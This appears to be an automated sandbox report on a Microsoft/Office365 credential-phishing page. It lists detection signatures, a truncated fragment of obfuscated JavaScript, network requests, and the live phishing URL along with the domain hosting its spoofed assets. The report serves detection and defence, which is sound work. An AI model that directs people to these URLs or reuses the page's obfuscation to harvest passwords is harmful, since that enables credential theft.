Edit tour

Windows Analysis Report
https://pub-ac902c48ff244e4fbf44f3e3296d093d.r2.dev/updatemypassword.html

Overview

General Information

Sample URL:	https://pub-ac902c48ff244e4fbf44f3e3296d093d.r2.dev/updatemypassword.html
Analysis ID:	1427705
Infos:

Detection

HTMLPhisher

Score:	92
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Phishing site detected (based on favicon image match)

Yara detected HtmlPhish10

Yara detected HtmlPhish29

Yara detected HtmlPhish44

HTML page contains obfuscate javascript

Phishing site detected (based on image similarity)

Phishing site detected (based on logo match)

HTML body contains low number of good links

HTML body contains password input but no form action

HTML title does not match URL

Submit button contains javascript call

Classification

Process Tree

System is w10x64

chrome.exe (PID: 5408 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 5772 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2352 --field-trial-handle=2252,i,10177473466307543095,12274142213128693203,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 6404 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://pub-ac902c48ff244e4fbf44f3e3296d093d.r2.dev/updatemypassword.html" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

cleanup

Malware Configuration

⊘No configs have been found

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
dropped/chromecache_53	JoeSecurity_HtmlPhish_44	Yara detected HtmlPhish_44	Joe Security

HTML

Source	Rule	Description	Author	Strings
0.0.pages.csv	JoeSecurity_HtmlPhish_29	Yara detected HtmlPhish_29	Joe Security
0.0.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security

Sigma Signatures

⊘No Sigma rule has matched

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: https://pub-ac902c48ff244e4fbf44f3e3296d093d.r2.dev/updatemypassword.html

SlashNext: detection malicious, Label: Credential Stealing type: Phishing & Social Engineering

Phishing

Phishing site detected (based on favicon image match)

Source: https://pub-ac902c48ff244e4fbf44f3e3296d093d.r2.dev	Matcher: Template: microsoft matched with high similarity
Source: https://pub-ac902c48ff244e4fbf44f3e3296d093d.r2.dev/updatemypassword.html	Matcher: Template: microsoft matched with high similarity

Yara detected HtmlPhish10

Source: Yara match

File source: 0.0.pages.csv, type: HTML

Yara detected HtmlPhish29

Source: Yara match

File source: 0.0.pages.csv, type: HTML

Yara detected HtmlPhish44

Source: Yara match

File source: dropped/chromecache_53, type: DROPPED

HTML page contains obfuscate javascript

Source: https://pub-ac902c48ff244e4fbf44f3e3296d093d.r2.dev/updatemypassword.html

HTTP Parser: document.write( unescape( %3C%21%44%4F%43%54%59%50%45%20%48%54%4D%4C%3E%3C%68%74%6D%6C%3E%3C%68%65%6

Phishing site detected (based on image similarity)

Source: https://pub-ac902c48ff244e4fbf44f3e3296d093d.r2.dev/updatemypassword.html

Matcher: Found strong image similarity, brand: MICROSOFT

Phishing site detected (based on logo match)

Source: https://pub-ac902c48ff244e4fbf44f3e3296d093d.r2.dev/updatemypassword.html

Matcher: Template: microsoft matched

Source: https://pub-ac902c48ff244e4fbf44f3e3296d093d.r2.dev/updatemypassword.html

HTTP Parser: Number of links: 0

Source: https://pub-ac902c48ff244e4fbf44f3e3296d093d.r2.dev/updatemypassword.html

HTTP Parser: <input type="password" .../> found but no <form action="...

Source: https://pub-ac902c48ff244e4fbf44f3e3296d093d.r2.dev/updatemypassword.html

HTTP Parser: Title: Sign in to your Office365 account does not match URL

Source: https://pub-ac902c48ff244e4fbf44f3e3296d093d.r2.dev/updatemypassword.html

HTTP Parser: On click: submit_form()

Source: https://pub-ac902c48ff244e4fbf44f3e3296d093d.r2.dev/updatemypassword.html

HTTP Parser: <input type="password" .../> found

Source: https://pub-ac902c48ff244e4fbf44f3e3296d093d.r2.dev/updatemypassword.html

HTTP Parser: No <meta name="author".. found

Source: https://pub-ac902c48ff244e4fbf44f3e3296d093d.r2.dev/updatemypassword.html

HTTP Parser: No <meta name="copyright".. found

Source: unknown	HTTPS traffic detected: 23.201.212.130:443 -> 192.168.2.4:49750 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.201.212.130:443 -> 192.168.2.4:49754 version: TLS 1.2

Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 23.201.212.130
Source: unknown	TCP traffic detected without corresponding DNS query: 23.201.212.130
Source: unknown	TCP traffic detected without corresponding DNS query: 23.201.212.130
Source: unknown	TCP traffic detected without corresponding DNS query: 23.201.212.130
Source: unknown	TCP traffic detected without corresponding DNS query: 23.201.212.130
Source: unknown	TCP traffic detected without corresponding DNS query: 23.201.212.130
Source: unknown	TCP traffic detected without corresponding DNS query: 23.201.212.130
Source: unknown	TCP traffic detected without corresponding DNS query: 23.201.212.130
Source: unknown	TCP traffic detected without corresponding DNS query: 23.201.212.130
Source: unknown	TCP traffic detected without corresponding DNS query: 23.201.212.130
Source: unknown	TCP traffic detected without corresponding DNS query: 23.201.212.130
Source: unknown	TCP traffic detected without corresponding DNS query: 23.201.212.130
Source: unknown	TCP traffic detected without corresponding DNS query: 23.201.212.130
Source: unknown	TCP traffic detected without corresponding DNS query: 23.201.212.130
Source: unknown	TCP traffic detected without corresponding DNS query: 23.201.212.130
Source: unknown	TCP traffic detected without corresponding DNS query: 23.201.212.130
Source: unknown	TCP traffic detected without corresponding DNS query: 23.201.212.130
Source: unknown	TCP traffic detected without corresponding DNS query: 23.201.212.130
Source: unknown	TCP traffic detected without corresponding DNS query: 69.164.42.0
Source: unknown	TCP traffic detected without corresponding DNS query: 69.164.42.0
Source: unknown	TCP traffic detected without corresponding DNS query: 69.164.42.0
Source: unknown	TCP traffic detected without corresponding DNS query: 69.164.42.0
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /updatemypassword.html HTTP/1.1Host: pub-ac902c48ff244e4fbf44f3e3296d093d.r2.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /ajax/libs/jquery/3.5.0/jquery.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://pub-ac902c48ff244e4fbf44f3e3296d093d.r2.devsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://pub-ac902c48ff244e4fbf44f3e3296d093d.r2.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /d..p/others/mi..cro---t/Converged_v21033_U7M7Fc-d_yiO2hIJng7nRg2.css HTTP/1.1Host: cdn-jm-tools.web.appConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://pub-ac902c48ff244e4fbf44f3e3296d093d.r2.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /d..p/others/mi..cro---t/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg HTTP/1.1Host: cdn-jm-tools.web.appConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pub-ac902c48ff244e4fbf44f3e3296d093d.r2.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /d..p/others/mi..cro---t/arrow_left_7cc096da6aa2dba3f81fcc1c8262157c.png HTTP/1.1Host: cdn-jm-tools.web.appConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pub-ac902c48ff244e4fbf44f3e3296d093d.r2.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /d..p/others/mi..cro---t/ellipsis_grey_2b5d393db04a5e6e1f739cb266e65b4c.svg HTTP/1.1Host: cdn-jm-tools.web.appConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pub-ac902c48ff244e4fbf44f3e3296d093d.r2.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /https://aadcdn.msauth.net/shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg/ HTTP/1.1Host: pub-ac902c48ff244e4fbf44f3e3296d093d.r2.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pub-ac902c48ff244e4fbf44f3e3296d093d.r2.dev/updatemypassword.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /d..p/others/mi..cro---t/arrow_left_7cc096da6aa2dba3f81fcc1c8262157c.png HTTP/1.1Host: cdn-jm-tools.web.appConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /d..p/others/mi..cro---t/ellipsis_grey_2b5d393db04a5e6e1f739cb266e65b4c.svg HTTP/1.1Host: cdn-jm-tools.web.appConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /d..p/others/mi..cro---t/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg HTTP/1.1Host: cdn-jm-tools.web.appConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pub-ac902c48ff244e4fbf44f3e3296d093d.r2.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /d..p/others/mi..cro---t/favicon.ico HTTP/1.1Host: cdn-jm-tools.web.appConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://pub-ac902c48ff244e4fbf44f3e3296d093d.r2.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: /Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic	HTTP traffic detected: GET /d..p/others/mi..cro---t/favicon.ico HTTP/1.1Host: cdn-jm-tools.web.appConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9

Source: unknown

DNS traffic detected: queries for: pub-ac902c48ff244e4fbf44f3e3296d093d.r2.dev

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 17 Apr 2024 23:23:16 GMTContent-Type: text/htmlContent-Length: 27242Connection: closeServer: cloudflareCF-RAY: 8760296fda3b1873-ATL

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443

Source: unknown	HTTPS traffic detected: 23.201.212.130:443 -> 192.168.2.4:49750 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.201.212.130:443 -> 192.168.2.4:49754 version: TLS 1.2

Source: classification engine

Classification label: mal92.phis.win@16/23@10/8

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2352 --field-trial-handle=2252,i,10177473466307543095,12274142213128693203,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://pub-ac902c48ff244e4fbf44f3e3296d093d.r2.dev/updatemypassword.html"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2352 --field-trial-handle=2252,i,10177473466307543095,12274142213128693203,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	Windows Management Instrumentation	1 Scripting	1 Process Injection	1 Process Injection	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Rootkit	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	3 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	4 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	3 Ingress Tool Transfer	Traffic Duplication	Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
https://pub-ac902c48ff244e4fbf44f3e3296d093d.r2.dev/updatemypassword.html	100%	SlashNext	Credential Stealing type: Phishing & Social Engineering

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://cdn-jm-tools.web.app/d..p/others/mi..cro---t/ellipsis_grey_2b5d393db04a5e6e1f739cb266e65b4c.svg	0%	URL Reputation	safe
https://cdn-jm-tools.web.app/d..p/others/mi..cro---t/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg	0%	URL Reputation	safe
https://cdn-jm-tools.web.app/d..p/others/mi..cro---t/Converged_v21033_U7M7Fc-d_yiO2hIJng7nRg2.css	0%	URL Reputation	safe
https://cdn-jm-tools.web.app/d..p/others/mi..cro---t/arrow_left_7cc096da6aa2dba3f81fcc1c8262157c.png	0%	URL Reputation	safe
https://cdn-jm-tools.web.app/d..p/others/mi..cro---t/favicon.ico	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
part-0013.t-0009.t-msedge.net	13.107.213.41	true	false	unknown
pub-ac902c48ff244e4fbf44f3e3296d093d.r2.dev	104.18.3.35	true	false	unknown
cdnjs.cloudflare.com	104.17.25.14	true	false	high
www.google.com	142.250.105.99	true	false	high
part-0012.t-0009.t-msedge.net	13.107.213.40	true	false	unknown
cdn-jm-tools.web.app	199.36.158.100	true	false	unknown
fp2e7a.wpc.phicdn.net	192.229.211.108	true	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://cdnjs.cloudflare.com/ajax/libs/jquery/3.5.0/jquery.min.js	false		high
https://pub-ac902c48ff244e4fbf44f3e3296d093d.r2.dev/updatemypassword.html	true		unknown
https://cdn-jm-tools.web.app/d..p/others/mi..cro---t/ellipsis_grey_2b5d393db04a5e6e1f739cb266e65b4c.svg	false	URL Reputation: safe	unknown
https://cdn-jm-tools.web.app/d..p/others/mi..cro---t/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg	false	URL Reputation: safe	unknown
https://cdn-jm-tools.web.app/d..p/others/mi..cro---t/Converged_v21033_U7M7Fc-d_yiO2hIJng7nRg2.css	false	URL Reputation: safe	unknown
https://cdn-jm-tools.web.app/d..p/others/mi..cro---t/arrow_left_7cc096da6aa2dba3f81fcc1c8262157c.png	false	URL Reputation: safe	unknown
https://cdn-jm-tools.web.app/d..p/others/mi..cro---t/favicon.ico	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.18.3.35	pub-ac902c48ff244e4fbf44f3e3296d093d.r2.dev	United States	13335	CLOUDFLARENETUS	false
142.250.105.99	www.google.com	United States	15169	GOOGLEUS	false
199.36.158.100	cdn-jm-tools.web.app	United States	15169	GOOGLEUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
13.107.213.41	part-0013.t-0009.t-msedge.net	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
13.107.213.40	part-0012.t-0009.t-msedge.net	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
104.17.25.14	cdnjs.cloudflare.com	United States	13335	CLOUDFLARENETUS	false

Private

IP
192.168.2.4

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1427705
Start date and time:	2024-04-18 01:22:18 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 3m 24s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	browseurl.jbs
Sample URL:	https://pub-ac902c48ff244e4fbf44f3e3296d093d.r2.dev/updatemypassword.html
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal92.phis.win@16/23@10/8
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 172.217.215.101, 172.217.215.139, 172.217.215.138, 172.217.215.100, 172.217.215.102, 172.217.215.113, 142.250.105.84, 172.253.124.94, 34.104.35.123, 64.233.185.95, 142.250.105.95, 64.233.176.95, 142.250.9.95, 74.125.136.95, 173.194.219.95, 142.251.15.95, 108.177.122.95, 172.217.215.95, 172.253.124.95, 64.233.177.95, 74.125.138.95, 52.165.165.26, 72.21.81.240, 192.229.211.108, 13.95.31.18, 20.166.126.56, 20.114.59.183, 142.250.105.94, 40.127.169.103
